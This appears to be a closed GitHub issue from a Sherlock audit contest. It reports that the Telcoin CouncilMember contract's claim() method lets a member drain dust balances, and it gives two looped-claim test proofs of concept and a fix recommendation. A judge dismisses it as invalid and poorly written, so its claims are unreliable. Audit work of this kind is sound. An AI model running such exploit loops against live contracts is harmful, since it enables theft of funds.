Closed sherlock-admin2 closed 9 months ago
CL001
high
TELCOIN can be drained becauseclaim() mtehod allow the withdrawal of the dust balance
claim()
poc 1
describe("my poc",()=>{ it("test claim",async ()=>{ await expect(councilMember.mint(member.address)); await expect(councilMember.mint(support.address)); //test poc2 for (let i=0;i<100;){ await expect(councilMember.connect(member).claim(0,0)).to.not.reverted; i++; } await expect(councilMember.connect(member).claim(0, 5000)).to.not.reverted; console.log('memeber telcoin balance:',await telcoin.balanceOf(member.address)); console.log(await telcoin.balanceOf(await councilMember.getAddress())); } ) }) my poc memeber telcoin balance: 5000n 5200n
poc 2
describe("my poc",()=>{ it("test claim",async ()=>{ await expect(councilMember.mint(member.address)); await expect(councilMember.mint(support.address)); //test poc1 for (let i=0;i<500;){ await expect(councilMember.connect(member).claim(0, 20)).to.not.reverted; i++; } console.log('memeber telcoin balance:',await telcoin.balanceOf(member.address)); console.log(await telcoin.balanceOf(await councilMember.getAddress())); } ) }) my poc memeber telcoin balance: 10000n 40100n
Due to council member can get more than their share feel free, leads to TELCOIN can be drained.
https://github.com/sherlock-audit/2024-01-telcoin/blob/0954297f4fefac82d45a79c73f3a4b8eb25f10e9/telcoin-audit/contracts/sablier/core/CouncilMember.sol#L92
https://github.com/sherlock-audit/2024-01-telcoin/blob/0954297f4fefac82d45a79c73f3a4b8eb25f10e9/telcoin-audit/contracts/sablier/core/CouncilMember.sol#L267
Manual Review
Redesign thecliam() method and _retrieve()mtehod , tracking the amountthat have been claimed by members, or limit the use of _retrieve()mtehod
cliam()
_retrieve()
amount
Duplicate of #23
1 comment(s) were left on this issue during the judging contest.
takarez commented:
invalid because { there is no clear impact mentioned and the report is poorly written}
CL001
high
TELCOIN can be drained if members claim() dust amount
Summary
TELCOIN can be drained because
claim()
mtehod allow the withdrawal of the dust balanceVulnerability Detail
poc 1
poc 2
Impact
Due to council member can get more than their share feel free, leads to TELCOIN can be drained.
Code Snippet
https://github.com/sherlock-audit/2024-01-telcoin/blob/0954297f4fefac82d45a79c73f3a4b8eb25f10e9/telcoin-audit/contracts/sablier/core/CouncilMember.sol#L92
https://github.com/sherlock-audit/2024-01-telcoin/blob/0954297f4fefac82d45a79c73f3a4b8eb25f10e9/telcoin-audit/contracts/sablier/core/CouncilMember.sol#L267
Tool used
Manual Review
Recommendation
Redesign the
cliam()
method and_retrieve()
mtehod , tracking theamount
that have been claimed by members, or limit the use of_retrieve()
mtehodDuplicate of #23